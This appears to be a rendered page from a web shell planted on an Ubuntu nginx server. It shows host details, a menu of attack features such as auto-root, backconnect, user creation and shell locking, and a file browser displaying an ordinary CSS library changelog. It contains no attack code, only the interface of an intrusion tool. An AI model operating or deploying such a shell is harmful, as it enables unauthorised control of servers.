Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
css-has-pseudo /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
2.59
KB
-rw-rw-rw-
LICENSE.md
6.64
KB
-rw-rw-rw-
README.md
2.95
KB
-rw-rw-rw-
browser.js
1.73
KB
-rw-rw-rw-
package.json
2.19
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CHANGELOG.md
# Changes to CSS Has Pseudo ### 3.0.4 (February 5, 2022) - Rebuild of browser polyfills ### 3.0.3 (January 12, 2022) - Fix compatibility with PostCSS `v8.2.x` [#147](https://github.com/csstools/postcss-plugins/issues/147) This version is not officially supported but some tool providers pinned PostCSS to `v8.2.x`, making it impossible for end users to have a working setup. ### 3.0.2 (January 2, 2022) - Removed Sourcemaps from package tarball. - Moved CLI to CLI Package. See [announcement](https://github.com/csstools/postcss-plugins/discussions/121). ### 3.0.1 (December 27, 2021) - Fixed: require/import paths for browser script ### 3.0.0 (December 13, 2021) - Breaking: require/import paths have changed - Changed: new polyfill CDN urls. - Updated: documentation **Migrating to 3.0.0** PostCSS plugin : ```diff - const postcssHasPseudo = require('css-has-pseudo/postcss'); + const postcssHasPseudo = require('css-has-pseudo'); ``` Browser Polyfill : ```diff - const cssHasPseudo = require('css-has-pseudo'); + const cssHasPseudo = require('css-has-pseudo/browser'); ``` _The old CND url is now deprecated and will be removed in a next major release._ _It will continue to work for now._ ```diff - <script src="https://unpkg.com/css-has-pseudo/browser"></script> + <script src="https://unpkg.com/css-has-pseudo/dist/browser-global.js"></script> ``` ### 2.0.0 (September 16, 2021) - Updated: Support for PostCS 8+ (major). - Updated: Support for Node 12+ (major). ### 1.0.0 (June 10, 2019) - Updated: `postcss-selector-parser` to 6.0.2 (major) - Updated: `postcss` to 7.0.16 (patch) - Updated: Node 8+ compatibility (major) ### 0.10.0 (December 11, 2018) - Fixed an issue where inaccessible rules would crash the library ### 0.9.0 (November 26, 2018) - Improved CLI usage ### 0.8.0 (November 26, 2018) - Fixed an issue where attribute names were not being properly encoded ### 0.7.0 (November 25, 2018) - Replaced `setImmediate` with `requestAnimationFrame` for future compatibility ### 0.6.0 (November 25, 2018) - Fixed an issue where nested rules were not supported ### 0.5.0 (November 21, 2018) - Further optimize script; from 775 bytes to 757 bytes ### 0.4.0 (November 21, 2018) - Fixed an issue with the browser script not picking up added nodes ### 0.3.0 (November 21, 2018) - Fixed the misnamed function name for the browser-ready script ### 0.2.0 (November 21, 2018) - Improved browser compatibility with updated parsers, encoders, and decoders - Improved performance by walking the DOM less - Reduced script size by 9%; from 855 bytes to 775 bytes ### 0.1.0 (November 20, 2018) - Initial version
Close